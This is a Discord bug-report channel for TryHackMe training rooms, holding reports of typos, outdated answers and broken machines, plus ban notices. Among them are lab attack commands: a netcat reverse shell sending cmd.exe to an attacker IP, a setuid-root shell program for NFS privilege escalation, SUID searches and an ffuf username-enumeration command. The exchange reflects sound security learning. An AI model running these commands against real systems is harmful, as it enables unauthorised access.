🔨 Banned 432488466853527552 indefinitely

https://tryhackme.com/room/walkinganapplication
||There are two flags for the last question, THM{GOT_AJAX......} and THM{HEADER_....}, shouldn't there only be one as to not bring up confusion?||

https://tryhackme.com/room/subdomainenumeration Task 6, first subdomain discovered is ||api||, and not ||delta||

hmmmm

Funny, does the attackbox use an older version?

ah yeah that sounds plausible

Yes.

If you take the wordlist from the Attackbox and use it on the VM it's the correct order.

Any idea if this can be fixed? Sorry for question, just wanting to finish the challenge in a fair way

I think this room was done by a member, so it *might * up to that individual to fix the room.

Q4, did you check the hint?

jups but the link provided in the hint is also dead, i'll contact the creator thanks for advice

-ban 725438344611495987 -ddays 1 spreading nitro scam/spam

🔨 Banned simon.steeel#9498 indefinitely

Hey ! there is a mismatch in Room Sandbox Evasion Task 4, the first part talks about the sleep function but shows a code snip from checking domain cotroller

Hey guys I think I found an unintended solution on wonderland? its an old machine but I haven't been able to find any similar writeups anywhere?
How do I contact the room creator?

Thanks

If it's a CVE privesc, those happen.

Oh okay 👍 got it! Because I was directly able to get root 😅

You're only cheating yourself

Hello.
I was doing the Post-Exploitation Basics task 3: Enumeration w/ Bloodhound and got an "incompatible collector" error uploading loot.zip to bloodhound.

It seems the bloodhound on the attackbox is a newly updated version that doesn't support SharpHound.ps1 collected data anymore, as I was able to upload data collected by SharpHound.exe. (And read about this error online at https://github.com/BloodHoundAD/BloodHound/issues/516)

I just thought that the SharpHound.ps1 that was already on the victims machine should be changed to SharpHound.exe to avoid this problem.

the error occurs because the sharpHoud.ps1 used is old

should I report misspelling here if found?

Asking me?

no

asking in general

The room is no longer public and thus is no longer maintained or supported.

Idk I just used linpeas that’s all I did 😭

Yeah, It's a useful place to look through for room fixes

i think rootme is bugged

when i run find / type -f -user root -perm -u=s 2> /dev/null in the shell i get nothing

what about find / -type f -user root -perm /4000 2>/dev/null

that worked thank you so much

nice...
I am surprised that even "misspelling" in rooms is included

Room: Active Directory Basic
Link: https://tryhackme.com/room/winadbasics
Issue: In the description or instruction, there is no Research and Development both in text and pictures.

fileinc room, task 6 - to include remote files and into a vulnerable application, and what exactly??

hey this comand doesnt work

Are you on the attackbox or VM?

huh

ok

ill delete that then

In the splunk101 room, task 7 asks, "What is the highest EventID?" This is confusing because it is not asking for the highest number, but rather the event with the most occurrences.

That has no impact to the room itself?

the defang link in task 6 of the "phishing emails 1" room is no longer valid. so i decided to try just go with what i and most people use which also was wrong.

so i was forced to go and verify the correct answer from somewhere else where i found out cyberchef also have a defang option which escape :// by default, which i almost never see. so i also suggest adding extra information such as "cyberchef also have a defang option" so people know they can use that when the defang resource no longer works.

Also, regarding the "-CLICK HERE" URL question, if i didn't already know i had to remove =?UTF-8?B? from the beginning and ?= from the end of the subject line string, i wouldn't had know how to deal with this as it don't mention that at all, i feel such information is important for people to know.

yes no impact just some extra child OU in machine but doesn't mention in room instruction

Hey,
Not a major bug but a typo, it says the "xargs" command on the left but the command is on the right.
https://tryhackme.com/room/nislinuxone -> Room URL

Hello guys regarding https://tryhackme.com/room/printnightmarec2bn7l

What is the primary registry path associated with this attack?

Is this a bug that I can't submit the right answer?

hello I have problem with https://tryhackme.com/room/walkinganapplication I cannot reach URL: https://LAB_WEB_URL.p.thmlabs.com from Attackbox

You need to start the machine.

Yes I have machine working and from firefox inside I cannot reach this URL

Have you pressed that green button?

?

thanks Scrubz

sorry for silly question it is working ;p

🙂

In 2 min(s) the URL will update and change.

yep 🙂 I thought launching VM is enough but also this I will remember now thanks

in room Obfuscation Principles (https://tryhackme.com/room/obfuscationprinciples), Task 4:
The task asks you to obfuscate a powershell snippet, and upload it to a website, which if obfuscated enough provides you with the flag. However, without obfuscating the snippet, it is still accepted and the flag is given anyway. Don't think that that's supposed to happen.

Very minor nitpick, but the the Attacking Kerberos room at task 6 (https://tryhackme.com/room/attackingkerberos) "well" should be "we'll"

Resolved thank you! cc @twin tapir saved you a job (:

Gave +1 Rep to @flat socket

Hi https://tryhackme.com/room/flatline any1 able to use the box?

Hello, I wanted to practice https://tryhackme.com/room/autopsy2ze0 room, but i didn't see the button to start the attached vm. Is it normal?

What do you mean?

Reporting a broken link in room: https://tryhackme.com/room/windowseventlogs

is the "Spotting the Adversary with Windows Event Log Monitoring" from NSA: https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm

I was able to launch a machine and nmap scan it.

If you need further help ask in #room-help

hello.
advent of cyber 1 - task 14 server is down.
https://tryhackme.com/room/25daysofchristmas

that is a known issue and is probably not getting fixed anytime soon.... have been like that for a long time

if you want shadow could send you the answer for that question as it is one of the rare instances where we are allowed to do that

alright. i already have the answer thanks

In 'Investigating Windows' I think the question ''
At what time did Windows first assign special privileges to a new logon? Answer format: MM/DD/YYYY HH:MM:SS AM/PM', the format should be modified, the hour is not 'HH' but just 'H'

seems there is a typo in the "diamond Model" task 6 as the sentence should be

Malicious activities occur in two or more events rather than just one

and not

Malicious activitiesdon'toccur in two or more events rather than just one

Hello Guy's, on the room Windows Forensics 1 there is an issue with the question "Which ControlSet contains the last known good configuration?" the answer is supposed to be "2" but it was set to "1"
https://tryhackme.com/room/windowsforensics1
"The hives containing the machine’s configuration data used for controlling system startup are called Control Sets. Commonly, we will see two Control Sets, ControlSet001 and ControlSet002, in the SYSTEM hive on a machine. In most cases, ControlSet001 will point to the Control Set that the machine booted with, and ControlSet002 will be the last known good configuration. " As said before the answer should be "2.

-banspam @silver fern

🔨 Banned Darisales#9725 indefinitely

Room: https://tryhackme.com/room/btredlinejoxr3d#
Task 4 question 2 wants to know the BIOS Version for the workstation.
The standard collector says "AMAZON - 1" which is wrong. Since I could solve all other questions for task 4 I suppose that the machine has been moved but the answer has not been updated.
Edit:
There is a previous error report from 9/9/2022 confirming this.
#791764435991658556 message

In the Intro to Networking room on Task 6 you have to use traceroute. A note should be added that on Debian systems you might need to install traceroute. I am on Ubuntu 22.04.

On *nix systems you might need to install it.
If you're using the attackbox it works, any other machine is your responsibility tooling wise.

Thanks for the reply. If that's the case then for consistency the note in Task 7 (I meant to say Task 6 in my previous message) about might having to install whois should be removed.

Gave +1 Rep to @eternal summit

In the Cholocate Factory, at the very end, to get root flag, I encountered an issue when trying to run the script on the remote host

Enter the key: ###########################################=
Traceback (most recent call last):
File "root.py", line 3, in <module>
key=input("Enter the key: ")
File "<string>", line 1
###########################################=
^
SyntaxError: unexpected EOF while parsing

(I redacted the key).

I had to download the code, and modify it to add a 'b' in front on the encrypted string.

🤣

ok

Room: https://tryhackme.com/room/linprivesc

Task 11: Privilege Escalation: NFS

Even after mounting a compiled nfs file with chmod to +s, I am not able to run the nfs file.

It throws an error saying {./nfs: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./nfs)
}

I have tried multiple of times but the same error again and again

Copy the bash binary that's already on the box.
You're cross-compiling, compiling for a different target environment

Or, more accurately, not cross-compiling

A couple of answers in Task 2 of WebOSINT appear to be out of date.

@ cyber defence path/sysinternals/task 9:the answer to "Run the Strings tool on ZoomIt.exe. What is the full path to the .pdb file?" is still the old answer from previous update to the room,because i gives a different path compared to people who have completed the room before and made a walkthough about it

Room: https://tryhackme.com/room/bof1
Task 4 Procedures Continued
Question "What register stores the return address?" should be "What register stores the return value?"

Room: https://tryhackme.com/room/nahamstore
Task 12 SQL Injection
Table name "sql_two" should be "sqli_two"

@raw bison

@earnest patio @glad badger Morning, Might wanna look at the licencing for THMJMP2 in https://tryhackme.com/room/lateralmovementandpivoting when you RDP in you get a warning message, and then checking the System bit, shows it's not activated. The network had been up for 4hours+ at this point, so it should have activated I think?
Oh, it was 10.200.75.101.
Anyway, figured it was worth bringing up, especially with that 109 day timer.

There's also Furthermore, outbound connections from THMDC are only allowed machines in its local network, making it impossible to receive a reverse shell directly to our attacker's machine. in Task 7. I think it's missing a to in the middle and should be [..] THMDC are only allowed to machines in its local network [..]

https://tryhackme.com/room/bof1
Command in task 8 doesn't work. No matter if it's passed in one line or executed as a .sh script

Agree the string command shows "D:\a\1\s\Win32\Release\ZoomIt.pdb" instead of "C:\agent_work\a\112\Win32\Release\ZoomIt.pdb"

The Windows Machines in the "signatureevasion" room exhibit a rather annoying behaviour: Once a file is uploaded and the check fails, the file is not properly deleted and thus subsequent uploads fail with "File already exists". Only remidiation seems to be to stop and restart the machine.

Room: https://tryhackme.com/room/pyramidofpainax
Task 5, last two questions basically asks the same thing, but the answers are different (the second-last wants the binary name)

I'm having the same issue, is it resolved for you?

no,they have to update the answer

I have a machine that will not let me terminate it can anyone help

I don't know if it's intentional or not, but in the room 'Git Happens', I'm getting this error with the login form

Uncaught (in promise) TypeError: crypto.subtle is undefined
digest http://10.10.247.28/:57
login http://10.10.247.28/:57
onclick http://10.10.247.28/:1

It doesn't prevent completing the room, but just to let you know.

In room 'WebOSINT', in Task 2, for the question 'What country is listed for the registrant?', the answer returned by whois is Iceland, but the answer is Panama. I tried different whois website, and I never got Panama. I think it has changed since the challenge has been created.

This room should be updated, many informations have changed since the creation of the room

@flat jolt No

bro sorry my account get hacked, i'm so sorry for that. but now i got it back

so now worry

and thanks for not banning me

but how tf i got hacked ,even i had my 2fa on, sms verification on, even tho i haven't clicked on any scam links yet too

sim swap 😆

not funny and doubtful but still....

especially if no other accounts were affected.

-banspam 238716171971592194

🔨 Banned Syvas#2402 indefinitely

Hey, I have found a bug in the room Zero Logon, Task 2 - Impacket Installation. Second line of code (after upgrading pip) we have to use *venv * command instead of virtualenv. Only after this installation progress further.

That will depend on things like your python version

Hey @eternal summit I was using web based kali from thm, arent those should be pre configured for the room? Or it is one build for all rooms?

The web based kali is not customized. None of them are adapted per-room either.

Oh I see, thank you!

https://tryhackme.com/room/bolt is the CMS page going down all the time a room feature or a bug?

https://tryhackme.com/room/btsysinternalssg in task 9 the answer that on the machine is not acceptable.

so it's a feature then, gotchu

It's not an issue on my end, not one of my previous 3 rooms right before this one were nearly unstable as this one, even after two box restarts

The 'Analyse Memory To Trace An Attackers Actions Using Volatility' hyperlink here, under Defensive Security, references the old / private room. https://tryhackme.com/room/startingoutincybersec

Minor nitpick, there is a spelling mistake in the Docker Rodeo,, task 6. At "the same job as it's networking sibling" should be "the same job as its networking sibling"

It's is correct.

it's = It is.

Yeah, but "accomplishes the same job as it is networking sibling" doesn't make sense

Nope, I seen the error.

NVm me, 😂

the apostrophe is used possessively

Yeah, so there shouldn't be one, right?

English is my second langauge, so I'm not too good at it

the cat's mother

although yeah actually

you're right

Alright haha, I'm rather confused at the moment

English is hard :<

its is not a possessive pronoun

Glad to be of use though :)

I'll update shortly ty(:

updated ❤️

Gread :)

Good morning all - I see that was brought up on the past, but I cannot RDP into the new Active Directory Basics room. It doesn't matter which username:password combination I use, it tells me that the credentials are incorrect. Thanks

Are you using the right domain?

I thought so, but those easy mistakes happen I guess. I will try again soon.

Hi everyone. Got an error saying this Room is private: https://tryhackme.com/room/persistence
It was referenced in the Cyber Kill Chain Task 6: https://tryhackme.com/room/cyberkillchainzmt

Not sure if this is an error, but just reporting it anyways.

Hi everyone, there are two questions in the Linuxfundamentalspart1 that i answered wrong because i missclicked still it accepted the answer, first its about > replacing i accidentally appended the word with >> the other one was, i should cat a text data, in it was "Hello World!" i answered "Hello World1" , i mean the Hello world one isnt so bad, but appending in a replace command feels like i made a mistake but still get the thumbs up , its Linuxfundamentalspart1, Task 5, Task 7.

Hello, this is called answer tolerance. As long as a large part (there’s a certain percentage but I can’t remember what) of your answer is correct, you will get the answer right

Useful in some cases, but in cases like this, it is not. If you refresh the page you should see the “true” answer

As the room creator, we have no control over this answer tolerance unfortunately

Hello everyone, i can't validate 2 questions in the room "Metasploit : Meterpreter" > Task 5 : Post-Exploitation Challenge in the Jr Penetration Tester which the room ask to write the path of the secrets.txt and realsecret.txt files

paragraph 2 of the task #3 in the https://tryhackme.com/room/osimodelzi room has some "I accidentally a word" issues, please fix

The receiving computer will also understand data sent to a computer in one format destined for in another format.
Like I understand what this is meant to convey. But it's a trainwreck to put it gently.
For example, when you send an email, the other user may have another email client to you, but the contents of the email will still need to display the same.
would sound better if "(...) the other user may have an email client that's different to yours.(...)"

Hi, I think the pcap file is missing from Carnage room or maybe I miss something?

hello guys, is there anyone having a problem in "vulnversity" room while browsing the given ip?

Are you going to the specified port

Probably not, I asked them in a different channel, they never got back to me though.

Having issues with Flag 13 in Windows Local Persistence in the Red Team Pathway. You are tasked to create a new key in HKCU\Environment that will run with the user relogs. I have reset the machine several times and recreated the variable but can never get the shell connection. Apparently other people have had this issue in the past. Not sure if I'm doing something or it's a bug so i'm putting it here

rootme bug for me, the connexion stop and restart a bit etc ... (modifié)
[21:44]
i uploaded a reverse shell but the connetion stop when it bug
[21:47]
'find: '/proc/14/ns': Permission denied
find: '/proc/15/task/15/fd': Permission denied
find: '/proc/15/task/15/fdinfo': Permission denied
find: '/proc/15/task/15/ns': Permission denied
find: '/proc/15/fd': Permission denied
find:

Terminate channel 3? [y/N]
Terminate channel 3? [y/N]
Terminate channel 3? [y/N]
Terminate channel 3? [y/N]
Terminate channel 3? [y/N]'

it's unplayable

You did find without redirecting errors and then control c'd. Not a bug

No, the meterpreter session closes itself and the web page is no longer displayed

maybe it come from the vpn

Perhaps you should not use a meterpreter.

Im counting finding this as OSINT 😂 that question sucked.

am i the only one who experiances "Exploiting Active Directory" room to be very slow ?

Same problems here, any hints? Got stuck too long on this one.

@sharp grotto . The THM forum linked on the room has the answers and some other issues/solutions. Up by the start attackbox button, there is a help button. Click Help then Forum Post and you’ll be at the THM forum for the room

Thanks @scenic heart ! I will check there.

Gave +1 Rep to @scenic heart

In the Honeypot room (https://tryhackme.com/room/introductiontohoneypots), on task 6, question 1, it asks for the CPU-info (hint: "Try reading /proc/cpuinfo"), but it seems the CPU has changed since the release of the room.

I had to look up a writeup for the answer to this one

the ||netcat rev shell in Mat's crontab || in Watcher isnt giving me a rev shell ...been 15 mins on a ||1 min job||

gtg mention me and i'll check in the morning

Is there something wrong with the Easy Peasy machine ??
I'm doing the port scan and 10 minutes later still no output.

Just hangs like this;

└──╼ $sudo nmap -p- -T4 10.10.158.4 | tee Port_Scan.txt
Starting Nmap 7.92 ( https://nmap.org )

Problem with Threat Intelligence Tools room from SOC

Task 3, Question 1

What on earth is this???

@civic tusk

Ah well nevermind, I am suppost to answer from screenshots and not analyze by my own

my bad

Something wrong with the Easy Peasy room ??;

└──╼ $sudo nmap -A -T4 10.10.158.4 | tee Aggressive.txt
[sudo] password for su8z3r0: 
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for 10.10.158.4
Host is up (0.27s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.16.1
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: nginx/1.16.1
|_http-title: Welcome to nginx!
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=11/16%OT=80%CT=1%CU=39111%PV=Y%DS=4%DC=T%G=Y%TM=637396
OS:91%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M505ST11NW6%O2=M505ST11NW6%O3=M505NNT11NW6%O4=M505ST11NW6%O5=M505ST
OS:11NW6%O6=M505ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)EC
OS:N(R=Y%DF=Y%T=40%W=F507%O=M505NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 4 hops

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   74.39 ms  10.4.0.1
2   ... 3
4   323.20 ms 10.10.158.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.57 seconds

Shows one port open though one is not the correct answer.

@quaint sparrow would you help me with this one plz ?

What

?

You have 1 port open, port 80 is open

See what I posted.

Yeah....

It's not accepting 1 as the correct answer though.

You haven't scanned all ports.

Unless -A adds them all.

I tried this, though it just hangs;

└──╼ $sudo nmap -p- -T4 10.10.158.4 | tee Port_Scan.txt
Starting Nmap 7.92 ( https://nmap.org )

Been like that for nearly 15 minutes with no output.

-A is aggressive

What am I missing @civic tusk ?

-p- scans all 65535 ports so yea.. it takes a while, but you can press enter it will show you how far the scan is (for example 80%) or you can press v for Verbose

-A found one port.
-p- found more than one port.

Oh yeah, I forgot I could press enter to see the % that has been completed :).
Thanks for reminding me.

Gave +1 Rep to @civic tusk

any key pressed will tell you that.

SYN Stealth Scan Timing: About 61.52% done; ETC: 00:53 (0:07:50 remaining)

I would reccomend sudo nmap -p- -vv -sT 10.10.158.4

This I did not know, thanks for that.

I just like to press that enter :DD

Oh yea, 7 minutes

Also, @elfin field your problem wasn't a bug

Yeah.... I realize now it was not.
I thought the room was bugged at the time though.

Just finished the Annie room. Though the privesc is really fun and everything, getting initial access is a pain and really buggy...

guys any fix for the ||cronjob|| in watcher?

did you make sure the file is executable...

Hello!

I have a bug in room (Crack The Hash Level 2)

By the Help, they exist, but it seems that the -l parameter is not working or at least it is not clear what it does.

Good morning all. I went back to the Active Directory Basics room again today, and I still get a "The user name or password is incorrect. Try again" on a Windows page (the blue Windows window opens with that notification, not as a xfreerdp error message). I am using xfreerdp /v:$IP /u:THM\Administrator /p:Password321 Any ideas on my problem?

Ha - i'm sure that's it, so stupid. Thanks

Reposting for context
Hey, I'm trying to load the burpsuitebasics room and its relevant website, but it's loading without CSS. Tried in incognito but no luck. Works when using direct ip rather than 0.0.0.0.p.thmlabs.com version

No luck with http/https

Refresh the page 2 - 3 times, just with F5, that seems to have fixed it for me

Not sure what's going on then, just retried in incognito and it's still not cooperating. Let me try another browser

Yeah, working on another browser

Must've been cached - thank you 😁

hololive - the start, extend and reset buttons are not working and the network is in the resetting state for the past maybe 10 hours

That is weird
Guessing probably something to do with the reverse proxy that p.thmlabs.com uses / caching therein, but honestly no idea.
I can't debug or change anything now either unfortunately 😦
At least it's working now though

https://tryhackme.com/room/persistence

Room not opening

For the Security Principles room, Task 4: Biba Model: says, “Start integrity property” instead of star integrity property.

No worries. I just had to manually type http to the start and then it would work fine, not a massive problem.

https://tryhackme.com/room/networkservices
Hi the machines for Telnet doesn't show open port
(Its been 10 min since the machine start)

@dusky junco Sorry to ping you directly, but can you take a look at this? If this doesn't just happen to me, it makes the room un-playable

try adding -p- as a flag

This is for the room creator (a community member) to resolve:)

oh alright, is there no admin who can temporarily lock the room or change the answer?

I got stuck on that task for hours

Thx for the tips

Gave +1 Rep to @flat socket

Anytime :)

Is anyone else having trouble with the Flatline room? the exploit just keeps timing out

@zinc cradle have fun

I still have the same problem on the Active Directory Basics room again today. I still get a "The user name or password is incorrect. Try again" on a Windows page (the blue Windows window opens with that notification, not as a xfreerdp error message). I am using "xfreerdp /v:$IP /u:THM\Administrator /p:Password321" Yesterday it was suggested that I shouldn't be using the backslash, but that did not fix my problem. I still cannot rdp to the machine. Additional information - under my xfreerdp command, I first get "Error: SSL_NOT_ALLOWED_BY_SERVER"

I think it has something to do with the AWS instance deployed on THM, my testing environment it worked flawlessly and quickly but I have noticed that when I deployed it for testing on THM it refused to respond, moving it up to a more powerful t2 instance improved performance but it still wasn’t great.

TL;DR Windows is a big boy and THM doesn’t get enough revenue from this box to justify paying for a more powerful instance than t2

That’s why most community boxes are Linux, coz it’s much smaller, cheaper and easier to run than Windows

There's another instance type that can be better - @dusky junco is that something that can be done? I remember the pricing being the same or better

(i realise that might not be a you thing, cmn, but I think it was you talking about the new instancr type way back)

Is this for a room that is intended for review (to be released for the public) or keeping it as a private room?

Isn't Flatline already released?

It was flatline

Let me check the completion analytics @zinc cradle

it does sometimes just fail to respond and usually you just need to reboot the box but thats i guess expected with Windows on 1GB of RAM

Users have less of a problem answering the first question, they do have a problem answering root.txt

I'll request a resource increase for it to t2.medium

idk mate, best ask the user

No worries, I can see it in my data. 😄 Increase requested.

Resources upgraded. 👍

I'm having this same problem.

I'm having issues with the Zero Logon room. I can't seem to get the impacket installation to work in attack box.
When running the first command, python3 -m pip install virtualenv, several things seem to work and then I get an error saying, "'importlib-resources' requires a different python 3.6.9 not in '>=3.7'"
So then when I run the second command, it just says there is no module named virtualenv
Wondering if Python was updated since this room was built and now these commands don't work...or I'm just missing something which seems more likely.
I'm thinking the fix would be force the box to run an older version of python but don't know how to do that

Posted this in room help earlier but wondering if it is a bug since the room was built

Sounds like the AttackBox has been updated and no longer has a suitable version of Python installed.
For, uh, various reasons the author of that room no longer has access to update it to match the latest version of Python, so unless QA fancy figuring out Impacket installations, you may need to debug it a little I'm afraid.

Decent chance you'll have better luck with a local Kali installation, for the record. Kali has older Python versions installed / available by default. Also gives you more flexibility with it.

yupp so basically this is a problem that's pretty much a result of all the different python environments and pip versions on the attackbox. You should be able to use python3.9 on the attackboz though. I.e:

python3.9 -m pip install virtualenv
python3.9 -m virtualenv impacketEnv```

If that doesn't work, then yeah I'd probably suggest either using a local kali or the THM kali as that handles different python versions a bit better. cc @obsidian kiln

I've an issue with the room Bounty Hacker.
If I use the VPN with my local Kali, I'm able to connect to the ftp but can't list the files or download them. Via the Attack Box all works fine, but Not from my local machine. I always get the message "switching to passive mode" and then timeouts

Yes, a Virtual Box with Kali and the VPN is running in the VM

Windows Internals, would this be considered a bug?

No, you're copying the wrong the character.

Not copying, entering.

I know you answered in the other chat, but just for information's sake, it worked by removing a character, by accident, and any other combination I tried didn't.

A good waste of an hour...

I answered that part in another chat too.

I don't get how that makes sense, it means it should have worked with my other variations... Im not sure what you mean by that then, sry

You got a character wrong, however removing that incorrect character allowed answer tolerance to kick in, if you refresh the room the right answer will be displayed. showing the character you got wrong.

looking at that now, and I've for sure tried that, likely my second attempt of many... I've done many rooms, and never got a problem to this extend with one of the answer fields

anyways im moving on, I thought it was worth a mention

This one is probably the worst because you can't properly copy from the box.

and the worst set of confusing characters... Its annoying, but there are worst things to deal with for sure... it was infuriating... I thought I was supposed to manipulate the file after so many attempts at getting it wrong...

Is there any bug in adbasics_v1.2 ?
I am unable to change the password for sophie even though i have given the due rights to phillips

-banspam @frank pelican

🔨 Banned uglyduck#0609 indefinitely

Hi All, I believe there are some errors on this page https://tryhackme.com/room/packetsframes (task 1 for now) also, the sentences are written in a confusing manner. Is this the correct place to report?

For example, it says " Think of this as putting an envelope within an envelope and sending it away. The first envelope will be the packet that you mail, but once it is opened, the envelope within still exists and contains data (this is a frame)." -- I am not an expert, but the frame is the outer envelope, and packet is inner. It does a poor job of explaining what a frame is, and its purpose.

Someone responsible should rewrite it.

I had to to google "frame vs packet", on the first hit I saw this image https://techdifferences.com/wp-content/uploads/2017/08/featured-4.jpg without any reading I understood what a frame and packet is, and how they relate. This is how it should be.

Hi all, anyone having network troubles with the Windows PrivEsc room? Got disconect from rdp every 30 seconds..

I am having the same issue with this box. Last night I was able to connect to it a few times, but tonight, no luck, even though I am using the same script. Like you, I can connect to the chatbox program on my local Win machine.

Hello, pleople!

In room:

https://tryhackme.com/room/nax

Exist a small differsense in exemple CVE.

Sounds simple, but it directs people to look for old CVEs. It would be nice to make this simple correction.

@dry blade

A second consideration would be to place a target to fetch the npiet tool. I think a hint button would be great.

Thanks!

i may have found a bug in the Windows Priv Esc room here

the command lacks the quotation marks i assume

echo 'c:\tools\nc64.exe -e cmd.exe 10.10.128.57 4444' > C:\tasks\schtask.bat

otherwise i get an error message

Hi i believe there are some issues with https://tryhackme.com/room/musicalstego room , the github user lookslike deleted so last 2 task are not solvables rn

Hey, inside the room 'Linux Fundamentals Part 1' (https://tryhackme.com/room/linuxfundamentalspart1) you mention the room for the "find" command. The provided url "https://tryhackme.com/room/thefindcommand" says the room is private tho.

this is intresting

i copied the answer(which is correct) to the url bar and it shows problem and somehow it is correct

Refresh the room page, it was probably answer tolerance so that it was correct in the first place

ok will try that

hello
Windows Event Logs ( https://tryhackme.com/room/windowseventlogs )
task 6 NSA resource link moved to: https://apps.nsa.gov/iaarchive/library/ia-guidance/security-configuration/applications/assets/public/upload/Spotting-the-Adversary-with-Windows-Event-Log-Monitoring.pdf

Hi, I'm currently experiencing some connection issues (connecting and disconnecting over and over again) with the machine in the "Windows Forensics 2" room, but my internet connection is stable. Any suggestions? Did not had that issue before.

hello
Active Reconnaissance https://tryhackme.com/room/activerecon
task 6 question 1: port 21 is not open

its not open

What's the title of the machine in the "Active Machine Information" box ?

NetSecMod Room 02 telnet

That's not the right machine for task 6

There is a new target machine to deploy there

🙂 makes sense. sry

Not an issue

Hey! In the toolbox: vim room b is not accepted to the question "How do we jump to the start of a word?"
I got that w is the right answer, but that should be specified in the question because I spent a few minutes thinking on what other method are there to go to the beginning of the word... : )

Working on the Mobile Analysis Room and noticed a small, potentially "wrong answer" issue.
Task 4, Q1 refers to virus total for the task's malware:
https://www.virustotal.com/gui/file/e201a1d2cecf1d04d97d59abec0863c716dcf9fcad89b85d036f9163a48057e7
Question asks about Avast-Mobile, but the accepted answer is for Avast (no mobile). Unless of course I'm misreading virus total, in which case I'll slink back under my rock... lol

The page shows:
Avast
Android:Metasploit-G [PUP]

Avast-Mobile
Android:Evo-gen [Trj]

The first is accepted.

Also, the questions is a bit awkward too; if you are fixing stuff, you may want to ditch the 'can' in:
"What does Avast-Mobile can tell us about this software?"

Question Text is Wrong

Room: Pyramid of Pain
Task 5
Third question is same of fourth.

Third question must ask for dropped binary name instead of malicious document name

Answer seems to be out of date

Room : Hackpark
Task 4
What is the OS version ?

When I use the sysinfo command, the OS version seems to not be the same (and the one displayed by the machine is wrong)

Maybe it's my bad, but I have no idea where I missed if its my bad

(Just delete this or DM me if it's normal 🙂 )

Have a good day

Unable to validate answer

Room: brim
Task 7
What is the amount of transfered bytes to "101.201.172.235:8888"?

When I enter the value it's always wrong but I 'm sure it's the right answer provided in the requested format

Total bytes, not only response. 🙂

Very likely not a room bug, ask in #room-help . You have to start the python server on the target machine

owaspTop10 - Task 25
The IP Address in the text is fixed

https://tryhackme.com/room/hydra#
Room: hydra#
Task: 2
Desc: SSH - the example command may be displayed incorrectly.

Not sure if this is by design or not.
When running the SSH command as displayed in the example it gives "[ERROR] could not connect to ssh:<MACHINE_IP:22> -Timeout connecting to <MACHINE_IP>

Solution
When removing the option "-t 4" it work just fine.

https://tryhackme.com/room/authenticationbypass

Task 2

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.141.146/customers/signup -mr "username already exists"

This command won't work

it works for me

wow

i see the damn error

SecLists directory is supposed to be secLists

wordlist if i may guess

yep

linux and their damn cap sensitive annoying software

i blurred results ofc

@sharp citrus new error now

check you command bit more

let me know when you see it 🙂

@wheat fractal

man im about to 😃 🔫

im an idiott

is ok. we are here to learn

@sharp citrus i have got it finaly working, but no names are displayed

can you paste that code here

wont let me paste it cuz idk why, prob cuz its a virt machine

ffuf -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.141.146/customers/signup -mr "username already exists"
use this exactly

@wheat fractal

whats the difference?

ill explain. ill let you know if this work

wrong directories, I changed that, i got admin, steve, robert, yay it worked, so what did you change?

will be sound weird. but all the " was problem.

i delete them and input again

since my terminal color code me some type mistakes

you hack from the website virtual machine or your own?

to get the special terminal filter?

i can attack you sice from that ip. if you think of that

first top code is your code. bottom one is mine

i use mine laptop. not the them one

aha, i get the problem

thanks for the troubleshoot

np

Heyo! I think an image is missing from this particular room:
https://tryhackme.com/room/linuxfundamentalspart2

• It references looking at "cmnatic.pem" file in the inital screenshot at the top of the task, (task 5) however the image in reference is not showing (though it does show in the video at the top of page).
• And based on the video, it's missing the image break down of the -rwxrwxrwx for showing what each grouping of permissions references (aka directory/file owner/etc)
• I believe that the first mention of su is in the wrong section of that specific task. Kind made my mind go "wat" as it was talking about rwx and all of a sudden bam su!

Hey, I've been trying to complete Task 11 of linprivesc, but when it comes to executing the executable on the target machine, I get an error of

My executable's code is just

#define _GNU_SOURCE
#include <unistd.h>
int main()
{
setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}